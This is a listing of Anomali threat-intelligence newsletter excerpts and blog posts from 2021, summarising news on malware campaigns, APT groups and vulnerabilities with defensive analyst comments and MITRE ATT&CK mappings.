Ransomware Malware Tool Vulnerability Threat | ||
|
2021-11-23 20:30:00 | Anomali Cyber Watch: APT, Emotet, Iran, RedCurl and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data breach, Data leak, Malspam, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Emotet malware is back and rebuilding its botnet via TrickBot
(published: November 15, 2021)
After Europol enforcement executed a takeover of the Emotet infrastructure in April 2021 and German law enforcement used this infrastructure to load a module triggering an uninstall of existing Emotet installs, new Emotet installs have been detected via initial infections with TrickBot. These campaigns and infrastructure appear to be rapidly proliferating. Once infected with Emotet, in addition to leveraging the infected device to send malspam, additional malware can be downloaded and installed on the victim device for various purposes, including ransomware. Researchers currently have not seen any spamming activity or any known malicious documents dropping Emotet malware besides from TrickBot. It is possible that Emotet is using Trickbot to rebuild its infrastructure and steal email chains it will use in future spam attacks.
Analyst Comment: Phishing continues to be a preferred method for initial infection by many actors and malware families. End users should be cautious with email attachments and links, and organizations should have robust endpoint protections that are regularly updated.
***For Anomali ThreatStream Customers***
To assist in helping the community, especially with the online shopping season upon us, Anomali Threat Research has made available two, threat actor-focused dashboards: Mummy Spider and Wizard Spider, for Anomali ThreatStream customers. The Dashboards are preconfigured to provide immediate access and visibility into all known Mummy Spider and Wizard Spider indicators of compromise (IOCs) made available through commercial and open-source threat feeds that users manage on ThreatStream.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Data Encrypted - T1022 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Automated Collection - T1119
Tags: Emotet, Trickbot, phishing, ransomware
Wind Turbine Giant Offline After Cyber Incident
(published: November 22, 2021)
The internal IT systems for Vestas Wind Systems, the world's largest manufacturer of wind turbines, have been hit by an attack. This attack does not appear to have affected their manufacturing or supply chain, and recovery of affected systems is underway, although a number of systems remain off as a precaution. The company has announced that some data has been compromised. The investigation of this incident is ongoing, but may have been a ransomware attack. The incidents of ransomware across the globe increased by near |
Ransomware Spam Malware Tool Vulnerability Threat Patching | ||
|
2021-11-16 17:34:00 | Anomali Cyber Watch: REvil Affiliates Arrested, Electronics Retail Giant Hit By Ransomware, Robinhood Breach, Zero Day In Palo Alto Security Appliance and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data breach, Data leak, Malspam, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer
(published: November 8, 2021)
US Cybersecurity and Infrastructure Security Agency (CISA) has released an alert about advanced persistent threat (APT) actors exploiting vulnerability in self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus. PaloAlto, Microsoft & Lumen Technologies did a joint effort to track, analyse and mitigate this threat. The attack deployed a webshell and created a registry key for persistence. The actor leveraged leased infrastructure in the US to scan hundreds of organizations and compromised at least nine global organizations across technology, defense, healthcare and education industries.
Analyst Comment: This actor has used some unique techniques in these attacks including: a blockchain based legitimate remote control application, and credential stealing tool which hooks specific functions from the LSASS process. It’s important to make sure your EDR solution is configured to and supports detecting such advanced techniques in order to detect such attacks.
MITRE ATT&CK: [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Application Layer Protocol - T1071 | [MITRE ATT&CK] Credentials in Files - T1081 | [MITRE ATT&CK] Brute Force - T1110 | [MITRE ATT&CK] Data Staged - T1074 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hooking - T1179 | [MITRE ATT&CK] Registry Run Keys / Startup Folder - T1060 | [MITRE ATT&CK] Pass the Hash - T1075
Tags: Threat Group 3390, APT27, TG-3390, Emissary Panda, WildFire, NGLite backdoor, Cobalt Strike, Godzilla, PwDump, beacon, ChinaChopper, CVE-2021-40539, Healthcare, Military, North America, China
REvil Affiliates Arrested; DOJ Seizes $6.1M in Ransom
(published: November 9, 2021)
A 22 year old Ukranian national named Yaroslav Vasinskyi, has been charged with conducting ransomware attacks by the U.S Department of Justice (DOJ). These attacks include t |
Ransomware Data Breach Malware Tool Vulnerability Threat Medical | APT 38 APT 27 APT 1 | |
|
2021-11-10 16:00:00 | Anomali Cyber Watch: GitLab Vulnerability Exploited In The Wild, Mekotio Banking Trojan Returns, Microsoft Exchange Vulnerabilities Exploited Again and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Babuk, Braktooth, Linux, Gamaredon, Magecart and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
BrakTooth Bluetooth Bugs Bite: Exploit Code, PoC Released
(published: November 5, 2021)
A proof-of-concept (PoC) tool to test for the recently revealed BrakTooth flaws in Bluetooth devices, and the researchers who discovered them have released both the test kit and full exploit code for the bugs. On Thursday, CISA urged manufacturers, vendors and developers to patch or employ workarounds. On Monday, the University of Singapore researchers updated their table of affected devices, after the chipset vendors Airoha, Mediatek and Samsung reported that some of their devices are vulnerable.
Analyst Comment: Users are urged to patch or employ workarounds as soon as possible.
Tags: Bluetooth, BrakTooth, Exploit, Vulnerability
CVE-2021-43267: Remote Linux Kernel Heap Overflow | TIPC Module Allows Arbitrary Code Execution
(published: November 4, 2021)
Researchers at SentinelOne have identified a vulnerability in the TIPC Module, part of the Linux Kernel. The Transparent Inter-Process Communication (TIPC) module is a protocol that is used for cluster-wide operation and is packaged as part of most major Linux distributions. The vulnerability, designated as “CVE-2021-43267”, is a heap overflow vulnerability that could be exploited to execute code within the kernel.
Analyst Comment: TIPC users should ensure their Linux kernel version is not between 5.10-rc1 and 5.15.
Tags: Linux, TIPC, Vulnerabiltity
Ukraine Links Members Of Gamaredon Hacker Group To Russian FSB
(published: November 4, 2021)
The Ukrainian Secret Service claims to have identified five members of the threat group, Gamaredon. The group, who Ukraine are claiming to be operated by the Russian Federal Security Service (FSB), are believed to be behind over 5,000 attacks against Ukraine. These attacks usually consist of malicious documents and using a template injection vulnerability, the group has targeted government, public and private entities.
Analyst Comment: Users should be careful that a file is sent via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel. Users should be careful when viewing documents that ask for macros to be enabled.
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204
Tags: Gamaredon, Malicious Documents, Russia, Ukraine, Template Injection
|
Ransomware Data Breach Malware Tool Vulnerability Threat | ||
|
2021-10-19 15:00:00 | Anomali Cyber Watch: FIN12 Ramps-Up in Europe, Interactsh Being Used For Malicious Purposes, New Yanluowang Ransomware and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cobalt Strike, Metasploit, Phishing, Ransomware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Harvester: Nation-State-Backed Group Uses New Toolset To Target Victims In South Asia
(published: October 18, 2021)
A new threat group dubbed ‘Harvester’ has been found attacking organizations in South Asia and Afghanistan using a custom toolset composed of both public and private malware. Given the nature of the targets, which include governments, IT and Telecom companies, combined with the information stealing campaign, there is a high likelihood that this group is Nation-State backed. The initial infection method is unknown, but victim machines are directed to a URL that checks for a local file (winser.dll). If it doesn’t exist, a redirect is performed for a VBS file to download and run; this downloads and installs the Graphon backdoor. The command and control (C2) uses legitimate Microsoft and CloudFront services to mask data exfiltration.
Analyst Comment: Nation-state threat actors are continually evolving their tactics, techniques and tools to adapt and infiltrate victim governments and/or companies. Ensure that employees have a training policy that reflects education on only downloading programs or documents from known, trusted sources. It is also important to notify management and the proper IT department if you suspect malicous activity may be occurring.
MITRE ATT&CK: [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Process Discovery - T1057
Tags: Backdoor.Graphon, Cobalt Strike Beacon, Metasploit
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
(published: October 14, 2021)
Unit 42 researchers have observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers - but also by attackers - to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof-of-concept (PoC) for an exploit can insert "Interactsh" to check whether the exploit is working, but the service could also be used to check if the PoC is working. The tool became publicly available on April 16, 2021, and the first attempts to abuse it were observed soon after, on April 18, 2021.
Analyst Comment: As the landscape changes, researchers and attackers will often use the same tools in order to reach a goal. In this instance, Interact.sh can be used to show if an exploit will work. Dual-use tools are often under fire for being able to validate malicious code, with this being the latest example. If necessary, take precautions and block traffic with interact.sh attached to it within company networks.
Tags: Interactsh, Exploits
|
Ransomware Spam Malware Tool Vulnerability Threat Patching Guideline | ||
|
2021-10-13 14:30:00 | Climbing the Threat Intelligence Maturity Curve (lien direct) | Creating a Successful Threat Intelligence Program Cyber threats are relentless and constantly evolving. Staying ahead requires advanced automation and a holistic threat intelligence program (TIP), which lead to a strategic advantage. There are three main pillars to help your organization advance up the maturity curve: people, process, and technology. People: Identify stakeholders for reporting and feedback in mapping out a process that will effectively channel intelligence. Process: Processes that take threat intelligence to a more strategic level must be developed and agreed upon cross-functionally. Technology: The technology used should deliver on the processes outlined to ensure it supports organizational goals. Climbing the Threat Intel Maturity Curve While all organizations are at a unique level of development in their threat intelligence program, take general steps to determine where you are now and what is needed to evolve your program. Threat Data Collection Raw data collection is the beginning of any intelligence-gathering process. The relevancy of the data is critical, coming from external and internal sources, including open source and commercial threat intelligence feeds. External data may include reports on IoCs (e.g., ISACs, Dark Web, vendors, clients, etc.) relevant to organizational vulnerabilities. Internal data is just as necessary as it informs intelligence with business-specific threats. Even at the beginning stage of a program, feedback from internal teams that have experienced a security incident should inform threat intelligence feeds to ensure they are relevant to the business. Threat Data Processing Processing or curating the data of relevant threats based on the complete environment is the next stage of development. Even when using only the most relevant sources for incoming data, the volume can be overwhelming, and automation is essential. Security tools can save analysts time by automatically weeding through the data for information that is actionable. Based on the organization's threat experience, well-targeted criteria will optimize this curation, enabling the automation to filter out the noise and produce practical intelligence. Threat Intelligence Integration As threat intelligence is a shared resource essential to stakeholders in different business functions, integrating systems will enable more relevant reporting and a better flow of feedback to improve intelligence gathering. Having a solid configuration management database (CMDB) and vulnerability management program is fundamental to integrate systems and processes successfully. Forming a Digital Forensics Investigations team that runs intel feeds against the complete environment can add significantly to actionable cyber threat intelligence. Once the integration is complete and your organization operates based on the latest threat intelligence, threats can be identified and blocked quickly. In addition to a faster response, insights into the capabilities of threat actors can be gained to thwart attacks at an earlier stage and before they enter the network. Another advantage of comprehensive integration is the convergence of physical with logical security. A simple use case would be if someone badged into a facility and then got on the virtual private network (VPN). The system could raise a flag that an employee within the firewall should not need to access the VPN. The odd behavior could be due to a stolen badge or malicious cyber activity. Either way, it would trigger an alert. Measuring Threat Intel Effectiveness Measuring effectiveness is a pillar of a matur | Vulnerability Threat Guideline | ||
|
2021-10-11 14:30:00 | Selecting a Threat Intelligence Platform (TIP) (lien direct) | Do You Need a TIP? Many organizations struggle with managing threat intelligence. There is too much data noise, reliance on manual processes that make it harder to correlate relevant intelligence, and difficulties in producing and distributing actionable reports to the right people. Organizations turn to a Threat Intelligence Platform or TIP to help alleviate some of these problems. A TIP is like a nerve center that pulls raw data and intelligence from multiple sources into a central repository. Using automation, it sifts through and correlates that data to find relevant intelligence through curation, normalization, enrichment, and risk scoring. A TIP can create a feedback loop that integrates with existing security systems by analyzing and sharing relevant, actionable threat intelligence across an organization. Key benefits of a TIP are reducing time to detection, enabling collaboration, and producing actionable information for stakeholders. Top Considerations When Selecting a TIP Stakeholders The search for a TIP should begin with a clear understanding of the audience it will be serving. The most frequent users of a TIP are threat intelligence analysts, SOC analysts, cyber threat hunters, IR analysts, and CISOs, each with different needs and expectations they hope to garner from the TIP. For example, threat intelligence analysts can use the curated information to create adversary dossiers, while CISOs can execute on strategic goals and keep costs down through time saved by automation. Collaboration Collaboration and threat intelligence sharing between groups is a core benefit of a TIP. In selecting a TIP, it is fundamental to understand organizational structure and how communications flow. Different teams should be able to share knowledge from anywhere at any time and with the ability to integrate the TIP into existing security systems. Choose your TIP based on the collaboration you require. Another factor in collaboration is the reporting capabilities of a TIP. Complete reports will be automated, including real-time alerts and summaries customized for different stakeholders and your specific industry. Data Aggregation and Curation within Context The ability of a TIP to ingest customized imports of data from internal and external sources is at the heart of its functionality. The flexibility of setting up customized data imports while also automatically pulling information from vendors or trusted third parties empowers security analysts to be more efficient. They will also have the ability to parse and index both structured (e.g., STIX/TAXII) and unstructured data (e.g., blogs, whitepapers, etc.). Another critical function of a TIP is curating the information it takes in. Optimizing curated data is vital when clarifying the context within your platform. Malicious actors that directly affect your industry and organization will get targeted using the intelligence produced by your TIP. Therefore, how you import vendor data and modify it to your organization’s specific needs is critical. Machine learning algorithms should sort the information and weigh the individual indicators of compromise (IoCs) based on context and user-defined scoring and relevance. Vulnerabilities native to the organization are the other side of the context equation. A TIP needs to match high-scoring IoCs with "crown jewels" and other essential assets. Patching is utilized to protect the most critical infrastructure. Determining the vulnerability context upfront will help determine the feedback loop that a TIP needs to facilitate. Deployment | Vulnerability Threat Patching | ||
|
2021-10-05 18:28:00 | Anomali Cyber Watch: New APT ChamelGang, FoggyWeb, VMWare Vulnerability Exploited and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, FoggyWeb, Google Chrome Bugs, Hydra Malware, NOBELIUM and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Google Just Patched These Two Chrome Zero-day Bugs That Are Under Attack Right Now
(published: October 1, 2021)
Google has warned users of Google Chrome to update to version 94.0.4606.71, due to two new zero-days that are currently being exploited in the wild. This marks the second update in a month due to actively exploited zero-day flaws. The first of these common vulnerabilities and exposures (CVEs), CVE-2021-37975, is a high severity flaw in the V8 JavaScript engine, which has been notoriously difficult to protect and could allow attackers to create malware that is resistant to hardware mitigations.
Analyst Comment: Users and organizations are recommended to regularly check for and apply updates to the software applications they use, especially web browsers that are increasingly used for a variety of tasks. Organizations can leverage the capabilities of Anomali Threatstream to rapidly get information about new CVEs that need to be mitigated through their vulnerability management program.
Tags: CVE-2021-37975, CVE-2021-37976, chrome, zero-day
Hydra Malware Targets Customers of Germany's Second Largest Bank
(published: October 1, 2021)
A new campaign leveraging the Hydra banking trojan has been discovered by researchers. The malware containing an Android application impersonates the legitimate application for Germany's largest bank, Commerzbank. While Hydra has been seen for a number of years, this new campaign incorporates many new features, including abuse of the android accessibility features and permissions which give the application the ability to stay running and hidden with basically full administrator privileges over a victim's phone. It appears to be initially spread via a website that imitates the official Commerzbank website. Once installed it can spread via bulk SMS messages to a user's contacts.
Analyst Comment: Applications, particularly banking applications, should only be installed from trusted and verified sources and reviewed for suspicious permissions they request. Similarly, emails and websites should be verified before using.
Tags: Banking and Finance, EU, Hydra, trojan
New APT ChamelGang Targets Russian Energy, Aviation Orgs
(published: October 1, 2021)
A new Advanced Persistent Threat (APT) group dubbed “ChamelGang” has been identified to be targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server’s ProxyShell and leveraging both new and existing malware to compromise networks. Researchers at Positive Technologies have been tracking the group since March 2017, and have observed that they have attacked targets in 10 countries so far. The group has been able to hi |
Ransomware Malware Tool Vulnerability Threat Guideline | Solardwinds Solardwinds APT 27 | |
|
2021-09-28 15:30:00 | Anomali Cyber Watch: Microsoft Exchange Autodiscover Bugs Leak 100K Windows Credentials, REvil Ransomware Reemerges After Shutdown, New Mac Malware Masquerades As iTerm2 and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, BlackMatter, Phishing, Malicious PowerPoint, Microsoft Exchange, REvil and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Malicious PowerPoint Documents On The Rise
(published: September 22, 2021)
McAfee Labs researchers have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. The sentiment used here is finance related themes such as purchase orders. In this campaign, the spam email comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to deliver variants of AgentTesla which is a well-known password stealer. Attackers use this remote access trojan (RAT) as MaaS (Malware-as-a-Service) to steal user credentials and other information from victims through screenshots, keylogging, and clipboard captures.
Analyst Comment: Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel.
MITRE ATT&CK: [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Remote Access Tools - T1219
Tags: AgentTesla, RAT, MaaS, Malware-as-a-Service, VBA macro, Banking And Finance
Microsoft Exchange Autodiscover Bugs Leak 100K Windows credentials
(published: September 22, 2021)
According to researchers from Guardicore have found a bug in the implementation of the “Autodiscover'' protocol is causing Microsoft Exchange’s Autodiscovery feature to automatically configure a user's mail client, such as Microsoft Outlook, with their organization's predefined mail settings. This is causing Windows credentials to be sent to third-party untrusted websites. Researchers have identified that this incorrect implementation has leaked approximately 100,000 login names and passwords for Windows domains worldwide.
Analyst Comment: Administrators are recommended to block TLD domains provided by researchers on github. https://github.com/guardicore/labs_campaigns/tree/master/Autodiscover. Even though most of the domains may not be malicious, adversaries can easily register and take them over. Also organisations are recommended to disable basic authentication.
Tags: EU & UK, China
Netgear SOHO Security Bug Allows RCE, Corporate Attacks
(published: September 22, 2021)
Researchers at Grimm discovered a high-severity security bug affecting several Netgear small office/home office (SOHO) routers could allow remote c |
Ransomware Spam Malware Vulnerability Threat | ||
|
2021-09-21 16:09:00 | Anomali Cyber Watch: Vermillion Strike, Operation Layover, New Malware Uses Windows Subsystem For Linux and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cobalt Strike, ELF, Data Leak, MSHTML, Remote Code Execution, Windows Subsystem, VBScript, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
CISA: Patch Zoho Bug Being Exploited by APT Groups
(published: September 17, 2021)
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert regarding a critical authentication bypass vulnerability, registered as “CVE-2021-4053,” that affects Zoho’s “ManageEngine ADSelfService Plus.” The vulnerability affects ManageEngine, a self-service password management and single sign-on solution from the online productivity vendor. The vulnerability is a Remote Code Execution (RCE) bypass vulnerability that could allow for remote code execution if exploited, according to the CISA. A successful exploitation of the vulnerability allows an actor to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, lateral movement, and exfiltrating registry hives and Active Directory files. Zoho released a patch for this vulnerability on September 6, but CISA claimed that malicious actors might have been exploiting it as far back as August.
Analyst Comment: Users should immediately apply the patch released by Zoho. Continuing usage of vulnerable applications will increase the likelihood that threat actors will attempt to exploit them, especially with open sources discussing the details of some vulnerabilities. These sources could allow some actors to create exploits to vulnerable software with malicious intent.
MITRE ATT&CK: [MITRE ATT&CK] Unsecured Credentials - T1552 | [MITRE ATT&CK] Valid Accounts - T1078
Tags: APT, Bug, Vulnerability, Zoho
Operation Layover: How We Tracked An Attack On The Aviation Industry to Five Years of Compromise
(published: September 16, 2021)
Cisco Talos, along with Microsoft researchers, have identified a spearphishing campaign targeting the aviation sector that has been targeting aviation for at least two years. The actors behind this campaign used email spoofing to masquerade as legitimate organizations. The emails contained an attached PDF file that included an embedded link, containing a malicious VBScript which would then drop Trojan payloads on a target machine. The malware was used to spy on victims as well as to exfiltrate data including credentials, screenshots, clipboard, and webcam data. The threat actor attributed to this campaign has also been linked to crypter purchases from online forums; his personal phone number and email addresses were revealed, although these findings have not been verified. The actor is located in Nigeria and is suspected of being active since at least 2013, due to IPs connected to hosts, domains, and the attacks at large originate from this country.
Analyst Comment: Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a |
Spam Malware Tool Vulnerability Threat | ||
|
2021-09-14 15:00:00 | Anomali Cyber Watch: Azurescape Cloud Threat, MSHTML 0-Day in The Wild, Confluence Cloud Hacked to Mine Monero, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android, APT, Confluence, Cloud, MSHTML, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag.
Trending Cyber News and Threat Intelligence
S.O.V.A. – A New Android Banking Trojan with Fowl Intentions
(published: September 10, 2021)
ThreatFabric researchers have discovered a new Android banking trojan called S.O.V.A. The malware is still in the development and testing phase and the threat actor is publicly-advertising S.O.V.A. for trial runs targeting banks to improve its functionality. The trojan’s primary objective is to steal personally identifiable information (PII). This is conducted through overlay attacks, keylogging, man-in-the-middle attacks, and session cookies theft, among others. The malware author is also working on other features such as distributed denial-of-service (DDoS) and ransomware on S.O.V.A.’s project roadmap.
Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Only use official locations such as the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. Furthermore, always review the permissions an app will request upon installation.
MITRE ATT&CK: [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Man-in-the-Middle - T1557 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Android, Banking trojan, S.O.V.A., Overlay, Keylogging, Cookies, Man-in-the-Middle
Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances
(published: September 9, 2021)
Unit 42 researchers identified and disclosed critical security issues in Microsoft’s Container-as-a-Service (CaaS) offering that is called Azure Container Instances (ACI). A malicious Azure user could have compromised the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. Researchers gave the vulnerability a specific name, Azurescape, highlighting its significance: it the first cross-account container takeover in the public cloud.
Analyst Comment: Azurescape vulnerabilities could have allowed an attacker to execute code on other users' containers, steal customer secrets and images deployed to the platform, and abuse ACI's infrastructure processing power. Microsoft patched ACI shortly after the discl |
Ransomware Spam Malware Tool Vulnerability Threat Guideline | Uber APT 41 APT 15 | |
|
2021-09-07 19:29:00 | Anomali Cyber Watch: FIN7 Using Windows 11 To Spread JavaScript Backdoor, Babuk Source Code Leaked, Feds Warn Of Ransomware Attacks Ahead Of Labor Day and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Babuk, Cryptocurrency, Data breach, FIN7, Proxyware, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Cybercrime Group FIN7 Using Windows 11 Alpha-Themed Docs to Drop Javascript Backdoor
(published: September 3, 2021)
Researchers from the Anomali Threat Research team have identified six Windows 11 themed malicious Word documents, likely being used by the threat actor FIN7 as part of phishing or spearphishing attacks. The documents, dating from late June/early July 2021, contain malicious macros that are used to drop a Javascript backdoor, following TTPs to previous FIN7 campaigns. FIN7 are a prolific Eastern European cybercrime group, believed to be responsible for stealing over 15 million card records in the US alone. Despite several high profile arrests, activity like this illustrates they are more than capable of continuing to target victims.
Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity. Furthermore, ensure that your employees are educated about the risks of opening attachments, particularly from unknown senders and any attachment that requests macros be enabled.
MITRE ATT&CK: [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Account Discovery - T1087
Tags: FIN7, phishing, spearphishing, maldoc, Windows 11, carding POS, javascript, backdoor, CIS
Feds Warn of Ransomware Attacks Ahead of Labor Day
(published: September 1, 2021)
The FBI and CISA put out a joint cybersecurity advisory Tuesday noting that ransomware actors often ambush organizations on holidays and weekends when offices are normally closed, making the upcoming three-day weekend a prime opportunity for threat activity. Often during holiday weekends, IT departments are staffed by skeleton crews, limiting their ability to respond and remediate to incidents. Holidays can also present tempting lures for phishing attacks. While the agencies haven' |
Ransomware Malware Tool Vulnerability Threat Guideline | ||
|
2021-08-31 16:40:00 | Anomali Cyber Watch: Ransomware Group Activity, Credential Phishing with Trusted Redirects, F5 BIG-IP Bugs, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android, Backdoor, FIN8, iPhone, Phishing, Vulnerabilities, and XSS . The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the "Anomali Cyber Watch" tag.
Trending Cyber News and Threat Intelligence
Widespread Credential Phishing Campaign Abuses Open Redirector Links
(published: August 26, 2021)
Microsoft has identified a phishing campaign that utilizes trusted domains combined with domain-generating algorithms and CAPTCHA portals that redirect users to malicious websites. These sites will prompt users to “re-enter” their credentials, scraping the login data. Since the initial domains are trusted, standard measures such as mousing over the link will only show the trusted site, and email filters have been allowing the traffic.
Analyst Comment: Because of the nature of these types of phishing attacks, only reset your password going through the official domain website and not through any emailed links. Be sure to check the URL address if going through a link to verify the site if asked to enter any credential information.
MITRE ATT&CK: [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Spearphishing Link - T1192 | [MITRE ATT&CK] Domain Trust Discovery - T1482
Tags: Phishing, Microsoft, North America, Anomali Cyber Watch
FIN8 Cybercrime Gang Backdoors US Orgs with New Sardonic Malware
(published: August 25, 2021)
FIN8, the financially-motivated threat group known for targeting retail, restaurant, and healthcare industries, is using a new malware variant with the end goal of stealing payment card data from POS systems. "Sardonic" is a new C++-based backdoor deployed on targets' systems likely via social engineering or spear-phishing. While the malware is still under development, its functionality includes system enumeration, code execution, persistence and DLL-loading capabilities.
Analyst Comment: Ensure that your organization is using good basic cyber security habits. It is important that organizations and their employees use strong passwords that are not easily-guessable and do not use the default administrative passwords provided because of their typically weak security. Update firewalls and antivirus software to ensure that systems can detect breaches or threats as soon as possible to reduce the severity of consequences. Educate employees on the dangers of phishing emails and teach them how to detect malicious emails. It is also recommended to encrypt any sensitive data at rest and in transit |
Ransomware Malware Tool Vulnerability Threat Guideline | ||
|
2021-08-24 17:11:00 | Anomali Cyber Watch: ProxyShell Being Exploited to Install Webshells and Ransomware, Neurevt Trojan Targeting Mexican Users, Secret Terrorist Watchlist Exposed, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT37 (InkySquid), BlueLight, Ransomware, T-Mobile Data Breach, Critical Vulnerabilities, IoT, Kalay, Neurevt, and ProxyShell. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag.
Trending Cyber News and Threat Intelligence
Microsoft Exchange Servers Still Vulnerable to ProxyShell Exploit
(published: August 23, 2021)
Despite patches a collection of vulnerabilities (ProxyShell) discovered in Microsoft Exchange being available in the July 2021 update, researchers discovered nearly 2,000 of these vulnerabilities have recently been compromised to host webshells. These webshells allow for attackers to retain backdoor access to compromised servers for further exploitation and lateral movement into the affected organizations. Researchers believe that these attacks may be related to the recent LockFile ransomware attacks.
